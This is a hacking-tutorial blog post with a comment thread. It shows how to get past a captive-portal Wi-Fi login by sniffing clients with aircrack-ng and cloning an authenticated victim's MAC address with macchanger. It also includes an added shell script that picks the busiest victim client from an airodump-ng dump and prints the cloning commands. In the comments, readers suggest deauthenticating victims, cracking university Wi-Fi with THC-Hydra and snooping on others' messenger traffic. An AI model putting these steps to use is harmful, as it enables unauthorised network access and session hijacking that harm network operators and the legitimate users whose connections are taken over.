Have you ever been away from home or on holiday and noticed an open network connection? FREE INTERNET! But then you find out that every search or page redirects you to an "enter password" or "signup here" page. Well, there are ways around this.
In this article, I'll show you how to bypass that login page, a captive portal, which is often loosely called a local network proxy, by cloning the hardware address of a device that has already logged in.
On a simple captive-portal setup, users connect, get a local IP from DHCP, and are held at the login page until they enter credentials; only then is their traffic let through to the internet. But how does the gateway know which computer has logged in? This is the key: the MAC address. The gateway records the MAC address of the authenticated device and allows its traffic until the session times out or the user signs out. Anything that shows up with the same MAC address is treated as that device, which is exactly what we exploit below.
The Exploit
To complete this exploitation, you'll need a Linux distro with a wireless driver that supports monitor mode (packet injection is not required for this technique), the Aircrack-ng suite, and a program called macchanger.
1) Open up Terminal and throw your card into monitor mode:
airmon-ng start wlan0 (or whatever your card's name is; newer versions of Aircrack-ng name the monitor interface wlan0mon instead of mon0, so substitute that in the commands below)
2) Now start airodump-ng and watch the devices connected to your victim network (once you know its BSSID and channel, the --bssid and -c options restrict the display to that network and its clients):
airodump-ng mon0
3) Note your victim network's MAC address (the BSSID). Then look at the lower table in airodump-ng, the station list: clients associated with your network show its BSSID in their BSSID column. Look for one with a high frame count and a strong PWR value (closer to 0 means closer to you), i.e. an active, nearby device that has almost certainly already passed the login page, and copy that device's station MAC address (NOT the access point's BSSID). If you're confused, take a look at the photo below:
4) Stop monitor mode and take the card down (macchanger will only change the address of an interface that is down):
ifconfig wlan0 down and airmon-ng stop mon0
5) Finally, with the card still down, clone the MAC address of the device you chose. macchanger prints the current and the new address, so check that the new one matches what you copied before going on:
macchanger -m XX:XX:XX:XX:XX:XX wlan0 (the victim's MAC, all six octets)
6) Bring the card back up with Wicd or a similar tool and connect to your victim's network. If all goes well, the portal sees a MAC address it has already authorised and you get internet access without ever seeing the login page. Two caveats: your access lasts only as long as the victim's session does, and while both devices are active on the same access point you will both suffer dropped and misdirected frames, because the AP cannot tell the two apart. Portals that also tie the session to the client's IP address may still send you to the login page if DHCP hands you a different address than the victim has.
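The whole procedure above, from picking a client out of airodump-ng's output to the commands that clone its address, as an added example that is not part of the original article. It works on a constructed CSV in the layout airodump-ng writes with -w dump --output-format csv (the station section starts with the header "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs"), ranks the target network's clients by frame count and then by signal strength, rejects malformed addresses such as a five-octet placeholder, and prints the spoofing commands instead of running them, so it can be read and run without a wireless card or root. The sample BSSIDs and station MACs, the interface name and the ranking rule are my assumptions.

```shell
#!/bin/sh
# Added example (not from the article): choose a client of the target AP from
# an airodump-ng CSV dump and emit the MAC-cloning commands for it.

# Constructed sample in the layout airodump-ng writes with
# `airodump-ng -w dump --output-format csv mon0`. Addresses are made up.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, speed, privacy, cipher, authentication, power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:09:58, 6, 54, OPN, , , -40, 900, 0, 0.0.0.0, 9, HotelWifi,
11:22:33:44:55:66, 2024-01-01 10:00:00, 2024-01-01 10:09:58, 11, 54, WPA2, CCMP, PSK, -70, 850, 0, 0.0.0.0, 8, NextDoor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2024-01-01 10:00:10, 2024-01-01 10:09:57, -38, 2210, AA:BB:CC:DD:EE:FF, HotelWifi
DE:AD:BE:EF:00:02, 2024-01-01 10:01:00, 2024-01-01 10:09:50, -81, 14, AA:BB:CC:DD:EE:FF,
DE:AD:BE:EF:00:03, 2024-01-01 10:02:00, 2024-01-01 10:09:59, -45, 3100, 11:22:33:44:55:66, NextDoor
DE:AD:BE:EF:00:04, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -30, 500, (not associated), HotelWifi,CoffeeShop
'

# pick_station CSV BSSID
# Prints the station MAC of the busiest client associated with BSSID
# (most frames, then strongest signal); prints nothing if there is none.
pick_station() {
    printf '%s\n' "$1" | awk -F',' -v bssid="$2" '
        /^Station MAC/ { in_stations = 1; next }   # rows above this are APs
        !in_stations || NF < 6 { next }             # skip AP rows and blanks
        {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if (toupper($6) != toupper(bssid)) next # not a client of our AP
            pkts = $5 + 0; pwr = $4 + 0             # "# packets" and "Power"
            if (best == "" || pkts > best_pkts || (pkts == best_pkts && pwr > best_pwr)) {
                best = $1; best_pkts = pkts; best_pwr = pwr
            }
        }
        END { if (best != "") print best }'
}

# valid_mac MAC: true only for six colon-separated hex octets, so a
# placeholder like XX:XX:XX:XX:XX (five groups) is caught before macchanger.
valid_mac() {
    printf '%s\n' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# spoof_commands IFACE MAC: the article's steps 4 and 5 in order, plus a
# verification line. Printed, not executed; pipe into sh as root to apply.
spoof_commands() {
    iface="$1"; mac="$2"
    cat <<EOF
airmon-ng stop mon0          # wlan0mon on newer Aircrack-ng
ip link set dev $iface down  # macchanger needs the interface down
macchanger -m $mac $iface
macchanger -s $iface         # "Current MAC" must read $mac before you connect
ip link set dev $iface up
EOF
}

main() {
    iface="${IFACE:-wlan0}"               # assumed interface name
    bssid="${BSSID:-AA:BB:CC:DD:EE:FF}"   # assumed target network
    target="$(pick_station "$SAMPLE_CSV" "$bssid")"
    if [ -z "$target" ]; then
        echo "no associated client of $bssid in the dump" >&2
        return 1
    fi
    valid_mac "$target" || { echo "malformed MAC: $target" >&2; return 1; }
    echo "# cloning $target (busiest client of $bssid)"
    spoof_commands "$iface" "$target"
}

main
```

With a real capture, replace SAMPLE_CSV with the contents of dump-01.csv; the station with the most frames is the one most likely to have an authorised session, and the verification line is there because a typo in the address (the most common reason this "doesn't work") shows up as a mismatch before you ever associate.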
Warnings
- Hacking is illegal! This is for educational purposes only.
- I am not responsible for any damage, harm or legal trouble you get yourself into.
11 Comments
Nice article, but you don't even need to use macchanger; all you have to do is "ifconfig wlan0 down && ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX (Vic's MAC) && ifconfig wlan0 up". I figured this out when I was trying to use my CR48 at my school, as they do a MAC filter to block all other people from accessing the network. The one downside to MAC spoofing is that the person doing it will get tons of lag if they are using the net at the same time as someone else.
Yup! Personally I prefer macchanger, but ifconfig does the same thing. Also, it's quite easy to deassociate the victim computer! But yeah, there is lots of lag if they're using the bandwidth. It's scary though how easy it is to get past these things.
Or if you're in Windows you can use a program called Cain and Abel to do a network sniff, grab the MACs from there and switch the MAC in Windows.
Are you guys recommending using the MAC of another logged-in end user and doing a "double-log-in"? Maybe you can use the MAC from the access point itself to log into the service provider and get the full bandwidth available to the access point? Just a thought...
I would recommend getting the MAC from someone on the network and not taking the access point's MAC, as it can cause conflict. But be advised that when people do search for a problem on the network, they often look for cloned MACs.
I got a question, if any of you all terrorists will answer it. I didn't read any of the other blogs, so I really don't know: what happens if the person with that IP address and that MAC address tries to sign on to the same server you're trying to sign on to?
In my university the wifi is password protected and it is used with a proxy 172.16.0.2, so can you tell me how to crack this password with any tool or software?
Sahil:
Check my articles on password cracking, especially the one on using THC-Hydra.
OTW
I got a wifi network near my house which uses MikroTik RouterOS and has a login screen. I knew the password and so I could log in. But now when I connect to that wifi the login screen won't come up by itself. And when I go to the login page manually by entering the URL of that login page, I can log in using the same username and password but am not able to access the internet. So what has actually happened? How can I access the internet? Please reply.
Does your device show up in the list of connected devices on the router?
Hey guys,
there's a big dormitory across the street from where I live, with a bunch of open APs. You can connect to them but you need to enter a valid username and password on the MikroTik login page to access the internet. Here are my questions:
1st. How can I access the free internet?
2nd. How can I see the data transferred on the network? I've tried Wireshark but I guess all the data is encrypted, because I can't see anything legible there.
3rd. With some Kali apps you can just see what they're doing in their browsers. Is there a way to see data sent by their phone messengers like WhatsApp or Telegram?
4th. How can I attack the router itself?